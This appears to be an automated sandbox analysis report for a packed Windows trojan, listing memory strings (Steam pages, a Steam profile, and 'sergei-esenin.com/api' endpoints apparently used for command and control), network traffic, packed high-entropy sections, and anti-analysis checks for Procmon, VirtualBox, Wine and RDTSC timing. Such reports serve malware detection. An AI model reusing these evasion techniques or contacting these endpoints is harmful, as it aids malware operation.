    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: file.exe, 00000001.00000002.1594572320.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1312496413.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api2
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apik
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000001.00000003.1301918029.0000000000F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampower
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com
    Source: file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000001.00000003.1301918029.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000001.00000003.1301918029.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49699 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49701 version: TLS 1.2

    System Summary

    barindex
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1112
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9994972153465347
    Source: file.exeStatic PE information: Section: fugcksxa ZLIB complexity 0.994714441302354
    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4836
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\8c3bb822-2b09-404b-b4a6-ca359a496681Jump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1112
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 1845248 > 1048576
    Source: file.exeStatic PE information: Raw size of fugcksxa is bigger than: 0x100000 < 0x198e00

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.880000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fugcksxa:EW;qefqscyw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fugcksxa:EW;qefqscyw:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x1ce572 should be: 0x1cf7df
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: fugcksxa
    Source: file.exeStatic PE information: section name: qefqscyw
    Source: file.exeStatic PE information: section name: .taggant
    Source: file.exeStatic PE information: section name: entropy: 7.976216456101455
    Source: file.exeStatic PE information: section name: fugcksxa entropy: 7.953474863404757

    Boot Survival

    barindex
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3D89 second address: 8E3D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3D8D second address: 8E3D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A594EB second address: A594F7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5100C93C06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A594F7 second address: A59518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5100BF03F8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
